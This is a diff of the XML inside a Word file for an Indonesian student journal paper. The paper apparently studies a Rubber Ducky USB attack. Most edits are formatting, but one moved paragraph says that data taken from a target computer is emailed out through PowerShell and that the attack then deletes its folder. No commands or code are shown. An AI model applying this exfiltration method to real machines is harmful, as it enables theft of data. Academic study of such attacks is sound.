-    <w:abstractNumId w:val="5"/>
   </w:num>
 </w:numbering>
 </file>
@@ -11147,7 +15526,7 @@
     <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
+    <w:lsdException w:name="Title" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
@@ -11584,7 +15963,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -11612,7 +15990,6 @@
     <w:name w:val="Title"/>
     <w:basedOn w:val="Normal"/>
     <w:next w:val="Normal"/>
-    <w:uiPriority w:val="10"/>
     <w:qFormat/>
     <w:pPr>
       <w:keepNext/>
@@ -12323,7 +16700,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{07A4C272-15E7-401C-8963-0D2B7B558638}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{AEFA6304-54D9-4286-8653-CB38D4031DB5}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/1202164284_Abdul Azies Muslim_Jurnal.docx
+++ b/1202164284_Abdul Azies Muslim_Jurnal.docx
@@ -393,15 +393,27 @@
         </w:rPr>
         <w:t>3</w:t>
       </w:r>
-      <w:hyperlink r:id="rId10">
+      <w:hyperlink r:id="rId10" w:history="1">
         <w:r>
           <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
             <w:b/>
+            <w:color w:val="auto"/>
             <w:sz w:val="20"/>
             <w:szCs w:val="20"/>
-            <w:u w:val="single"/>
+            <w:lang w:val="id-ID"/>
           </w:rPr>
-          <w:t>email3@telkomuniversity.ac.id</w:t>
+          <w:t>ahmadalmaarif</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:color w:val="auto"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>@telkomuniversity.ac.id</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -1708,6 +1720,7 @@
           <w:id w:val="641777847"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -1913,6 +1926,7 @@
           <w:id w:val="-373309679"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -2165,6 +2179,7 @@
           <w:id w:val="587281332"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -2416,6 +2431,7 @@
           <w:id w:val="487986904"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -4611,20 +4627,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:left="317" w:firstLine="361"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:bCs/>
-          <w:iCs/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="1"/>
@@ -4654,6 +4656,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Sistem Operasi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="10"/>
@@ -6084,20 +6087,33 @@
         <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Data yang telah didapatkan dari komputer target dikirimkan kepada penulis melalui email yang telah ditentukan dan dijalankan melalui Powershell. Penyerangan diakhiri dengan menghapus folder yang telah dibuat.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1004"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
           <w:b/>
           <w:color w:val="000000"/>
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Data yang telah didapatkan dari komputer target dikirimkan kepada penulis melalui email yang telah ditentukan dan dijalankan melalui Powershell. Penyerangan diakhiri dengan menghapus folder yang telah dibuat.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6120,15 +6136,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Pe</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="12" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="12"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>ngembangan Sistem</w:t>
+        <w:t>Pengembangan Sistem</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6157,6 +6165,15 @@
         </w:rPr>
         <w:t xml:space="preserve"> mekanisme penyerangan yang dilakukan pada penelitian ini.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="284" w:firstLine="394"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6178,10 +6195,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03269778" wp14:editId="7A8D96BB">
-            <wp:extent cx="1594714" cy="7497444"/>
-            <wp:effectExtent l="0" t="0" r="5715" b="8890"/>
-            <wp:docPr id="11" name="Picture 11"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00AB482B" wp14:editId="3FFAFBDE">
+            <wp:extent cx="5724814" cy="6093562"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="2540"/>
+            <wp:docPr id="1" name="Picture 1" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6189,10 +6206,8 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 7"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
+                    <pic:cNvPr id="1" name="Alur Penyerangan 2.png"/>
+                    <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
                     <a:blip r:embed="rId13">
@@ -6202,23 +6217,18 @@
                         </a:ext>
                       </a:extLst>
                     </a:blip>
-                    <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr bwMode="auto">
+                  <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="1663985" cy="7823117"/>
+                      <a:ext cx="5865873" cy="6243707"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -6512,17 +6522,6 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="284"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6564,12 +6563,11 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc43264846"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      <w:bookmarkStart w:id="12" w:name="_Toc43264846"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
         <w:t xml:space="preserve">Menjalankan </w:t>
       </w:r>
       <w:r>
@@ -6673,6 +6671,7 @@
           <w:noProof/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -9090,12 +9089,7 @@
         <w:ind w:firstLine="567"/>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
           <w:color w:val="auto"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
@@ -9164,6 +9158,22 @@
         </w:rPr>
         <w:t>Rubber Ducky</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9544,7 +9554,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="16" w:name="_Toc43264849"/>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="12"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -13249,12 +13259,14 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
+      <w:sdtEndPr/>
       <w:sdtContent>
         <w:sdt>
           <w:sdtPr>
             <w:id w:val="111145805"/>
             <w:bibliography/>
           </w:sdtPr>
+          <w:sdtEndPr/>
           <w:sdtContent>
             <w:p>
               <w:pPr>
@@ -15963,6 +15975,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -16700,7 +16713,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{AEFA6304-54D9-4286-8653-CB38D4031DB5}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1DD8C5D8-59C4-4D98-AC66-47501C10BA05}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
